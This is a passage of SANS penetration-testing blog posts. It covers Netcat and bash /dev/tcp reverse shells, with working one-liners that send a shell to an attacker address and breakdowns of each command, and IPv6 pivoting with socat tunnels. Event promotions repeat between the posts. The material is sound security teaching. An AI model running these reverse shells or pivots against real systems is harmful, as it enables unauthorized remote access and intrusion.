We’ve beaten the proverbial Linux horse to death, but what about Windows? As a bonus, here’s an option in PowerShell: Invoke-RestMethod http://ipinfo.io/json | Select -exp ip

 

Conclusion

There are tons of different ways this task can be accomplished and many different tools at your disposal to do so. If you have a favorite or unique take on determining the public IP address of a Linux system from the command line please share in the comments below!

Matthew Toussain
https://twitter.com/0sm0s1z

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Pen Test Poster: “White Board” – Bash – Bash’s Built-In Netcat Client

Board Elements_clean_BashGÇÖs Built-In Netcat Client

By Matthew Toussain, Geoff Pamerleau

Introduction

Sifting through client external and internal websites is a vital step in any pentest. A tester can uncover all sorts of juicy information such as the identities of important individuals, email addresses, corporate jargon, trusted relationships, and more just hanging out there in the open. But sometimes you really hit the jackpot, command injection! While this isn’t meant to be a blog post on web app pentesting, modern websites provide prolific exploitation opportunities to network penetration testers, starting at shell. Whether you’ve attained remote code execution through a web flaw, remote file inclusion, or admin access to popular content management systems like WordPress, converting your toehold into an interactive session on the target is a solid next step.

 

BuiltInNetcatClient_01

Methods Covered in this Section

  • nc -e reverse shell:
nc -e /bin/sh 10.0.0.189 1234
  • nc reverse shell without -e:
rm /tmp/pipe; mkfifo /tmp/pipe; cat /tmp/pipe|/bin/sh -i 2>&1|nc 10.0.0.189 1234 > /tmp/pipe
  • /dev/tcp reverse shell:
bash -i >& /dev/tcp/10.0.0.189/80 0>&1

 

We all know and love Netcat right? It’s the “TCP/IP Swiss Army Knife!” A simple little nc one liner can turn command execution into shell access:

nc -e /bin/sh 10.0.0.189 1234

 

Many modern versions of nc ship without the -e option due to the obvious security implications demonstrated above, but even without the -e option, we can achieve shell through pipes and output redirection as seen below:

rm /tmp/pipe; mkfifo /tmp/pipe; cat /tmp/pipe|/bin/sh -i 2>&1|nc 10.0.0.189 1234 > /tmp/pipe

 

Both of those commands have one big limitation: they require nc to be present on the system. Unfortunately, this isn’t always the case. For those times when nc isn’t available, the same functionality can be found using nothing more than bash.

 

/dev/tcp

 

For this trick to work the target system’s bash must have been compiled with the --enable-net-redirections flag. The magic of this flag is that it causes accesses on the /dev/tcp/ip_address/port device file to read and write from a TCP socket that is dynamically created based on the IP Address (or hostname) and port specified in the file path. The additional magic is found in the ubiquity of bash and that most major Linux distributions ship with this option included.

In order to turn this into an interactive session, we need to connect /dev/tcp to a nc listener running on our attack station and tie read and write operations from the /dev/tcp device file to the input and output of a bash process.

/dev/tcp reverse shell:
bash -i >& /dev/tcp/10.0.0.189/80 0>&1

BuiltInNetcatClient_02

Note that the result of the whoami has changed from our listener to the user that instantiated the bash reverse shell… root

 

Command Breakdown

  • On attack station:

nc -vlp 9000

1. nc - Command line tool for making TCP sockets
2. -v - Execute in verbose mode
3. -l - Listen, open a TCP socket on the local machine
4. -p 9000 - Port to listen on

 

  • On target:

bash -i >& /dev/tcp/10.0.0.189/9000 0>&1

1. bash - Bourne-Again SHell command language interpreter
2. -i - Interactive mode
3. >& - Direct bash stdout into the /dev/tcp file descriptor
4. /dev/tcp/10.0.0.189/9000 - Connects to port 9000 on 10.0.0.189
5. 0>&1 - Redirects stdin from the connection back into bash

 

So what exactly is the above doing? First, we run an interactive bash session and direct both standard out and standard error to the /dev/tcp file descriptor that represents the connection to our nc listener. Then we specify to read standard input from the connection back to the bash shell that has been spawned. Since we invoked an interactive session, our nc listener should stay connected to this bash process until we exit out of the session.

 

As was previously mentioned, bash support of /dev/tcp isn’t guaranteed. Recent Ubuntu and Redhat releases as well as OSX/MacOS support it while Debian traditionally does not. A quick check to test for support is to run the following:

: < /dev/tcp/www.google.com/80 && echo Supported || echo Unsupported

 

If you’ve got a unique use for /dev/tcp bash support, please include it in the comments below!

Matthew Toussain

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

 

Pen Test Poster: “White Board” – Bash – Useful IPv6 Pivot

 

Board Elements_clean_Useful IPv6 Pivot

By Matthew Toussain, Grant Curell

 

Introduction

As a guy coming from network engineering, it is really exciting to see IPv6 adoption finally starting to pick up. According to Akamai, Belgium is leading the charge at a whopping 50.3% adoption rate, but the US is picking up steam at a respectable 24.3% at the end of 2016. This means the pentesting community will be seeing it more in our day to day work, which will come as something of a surprise to many.

IPv6 brings a lot of changes, many of which are relevant from a security perspective. It also brings with it unique potential for added vulnerable space that can be leveraged in network compromises. IPv6 is not well understood and prone to misconfiguration. During security assessments, I’ve seen these settings result in critical security vulnerabilities including a firewall configured to provide carte blanche access to the entire network for all traffic using IPv6. Operating in IPv6 and taking advantage of these weaknesses is a key opportunity for pentesters.

 

Methods Covered in this Section

  • socat IPv4IPv6 Tunnel:
socat TCP4-LISTEN:80,fork,su=nobody TCP6:[2000::1:215:5dff:fe01:247]:80
  • socat Local Link IPv4IPv6 Tunnel:
socat TCP4-LISTEN:445,fork,su=nobody TCP6:[fe80::2d24:c19c:892:4d3%eth0]:445

 

useful_ipv6_01

Background

There are a couple of things to understand before hopping into an IPv6-centric pentest. Most in the field are familiar with the big difference: a larger address space. The addresses are 128 bits instead of the traditional 32. If you are in a pentesting engagement, most of the targets you will encounter are broken into /64 subnets. ARIN, the agency responsible for IP address assignment in North America, is handing out the addresses in pretty generous chunks for now. This is probably a safe practice considering there are 3.402×10^38 possible addresses available.

Fun fact: there are roughly 7×10^27 atoms in the average 155 pound person. This means there are enough IPv6 addresses to assign an address to each atom of every person on the entire planet and have plenty of addresses left over.

One of the most notable differences in IPv6 is that interfaces can and frequently have multiple IP addresses. Each interface will *typically* have both a link local IP address and a global IP address.

eth0      Link encap:Ethernet HWaddr 00:15:5d:01:02:29
          inet6 addr: 2000::1:215:5dff:fe01:229/64 Scope:Global
          inet6 addr: fe80::215:5dff:fe01:229/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
          RX packets:118 errors:0 dropped:0 overruns:0 frame:0
          TX packets:72 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:18041 (18.0 KB) TX bytes:17748 (17.7 KB)

 

Above is a very common IPv6 configuration. Any global address will begin with 2000::/3 and a link local address will begin with FE80::/10. On Linux distributions, this is annotated by Scope:Global or Scope:Link next to the address in the ifconfig command output. In IPv6, global IP addresses can be thought of in a similar fashion as public IP addresses in IPv4. However, unlike the IPv4 169.254.0.0/16 link local address space, almost all IPv6 interfaces will have an autoconfigured link local address typically generated from the interface’s MAC address.

 

Pivoting with IPv6

Now that we have some background, we can examine pivoting techniques. Many tools natively support IPv6, but some do not. Consider, the web server vulnerability scanner Nikto:

useful_ipv6_02a

 

Hmmm, not the results we were looking for. The problem is that Nikto doesn’t understand IPv6! To get around this limitation we can use a technique called tunneling. The concept behind tunneling is encapsulation. In the case of Nikto, we need to encapsulate it’s IPv4 content within an IPv6 stream. This condition often proves true in environments as well. Often IPv6 isn’t ubiquitous throughout the network. In the network engineering community network pockets that support IPv6 are called IPv6 “islands.” One way we link them together is by tunneling IPv6 over IPv4. IPv6 goes in, becomes IPv4, it traverses the IPv4 backbone, and comes out the other side IPv6. What this means to us as pentesters is that IPv6, in addition to having unique vulnerabilities, can frequently be a means to navigate from one part of a network to another. In some cases, an IPv6 target can take us behind the firewall and into the heart of the network. To get Nikto working against an IPv6 target we need to replicate this IPv4IPv6 condition on our local system.

To accomplish this we will use a tool called SOcket CAT or socat. SOCAT is a multipurpose relay tool with IPv6 compatibility that is syntactically similar to the traditional Netcat. socat comes with enhanced functionality built in that we can leverage to form bidirectional byte streams in order to tunnel our tools over IPv6. This works by opening a TCP socket listening on an IPv4 address and then forwarding all traffic received to a TCP socket listening on an IPv6 address. Let’s instantiate a socat IPv4IPv6 tunnel, and verify that it is running:

socat IPv4IPv6 tunnel:
socat TCP4-LISTEN:80,fork,su=nobody TCP6:[2000::1:215:5dff:fe01:247]:80

useful_ipv6_02

Command Breakdown

socat TCP4-LISTEN:80,fork,su=nobody TCP6:[2000::1:215:5dff:fe01:247]:80

  1. 1. socat - Command line tool that establishes bidirectional byte streams
    2. TCP4-LISTEN:80 - Specifies TCP port to receive incoming data
    3. fork - Forks a child process for each established connection
    4. su=nobody - Runs each forked process as an unprivileged user
    5. TCP6:[2000::..:247] - Remote destination to connect to
    6. :80 - Remote port to connect to

 

This creates an IPv4 socket on port 80 listening on all interfaces. SOCAT will forward any traffic received on port 80 by the local system to port 80 on the remote system at 2000::1:215:5dff:fe01:247.

useful_ipv6_03

 

Using nc to make a GET request we see the same result returned for the remote IPv6 web server. The first command points to the localhost SOCAT redirector which forwards the traffic over IPv6. The second is a direct netcat connection over IPv6 to 2000::1:215:5dff:fe01:247. Now let’s give Nikto a try:

useful_ipv6_04

 

Now that the tunnel is running. We can examine the traffic to see what is happening in the background. This is the traffic coming out of the pentester’s system on eth0 during the Nikto scan. You can see the traffic traversing over IPv6 as expected:

useful_ipv6_05

You can use SOCAT in much the same manner you would use SSH tunneling. Below is a screenshot of a browser accessing localhost over port 80. Here, SOCAT forwards the traffic to a remote IPv6 address for us enabling access to the metasploitable2 home page. SOCAT also natively supports socks proxying by way of the SOCKS4A option. SOCAT redirectors can be chained together to further enable network mobility or even covert operations.

useful_ipv6_06

 

Gotcha

There is one “gotcha” with this technique. When you are communicating over the link local interface you must tell the machine which interface you are using. This changes our SOCAT syntax to look something like this:

socat local link tunnel:
socat TCP4-LISTEN:445,fork TCP6:[fe80::2d24:c19c:892:4d3%wlp1s0]:445

useful_ipv6_07

 

Notice that the desired link local interface must be added to the target address in the command above (wlp1s0 in this case). Link local addresses only work within the layer 2 domain of the interface. In IPv4 terms this behavior is similar to ARP broadcast domains. If an ARP broadcast would touch the interface, you will be able to use an interface’s link local address.

This is a handy technique to keep in mind while pentesting because almost all operating systems enable IPv6 by default. A network may have limited layer 3 IPv4 connectivity due to segmentation and filtering, but you just might be able to connect to an IPv6 link local address.

Hopefully IPv6 and the options available make a bit more sense now! The next chance you get, I heartily recommend taking a look around for the presence of IPv6. Network engineers are still coming to terms with the security implications to their networks. For pentesters this opens a world of vulnerability possibilities and you never know what you might find… until you do.

Matthew Toussain
https://twitter.com/0sm0s1z

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02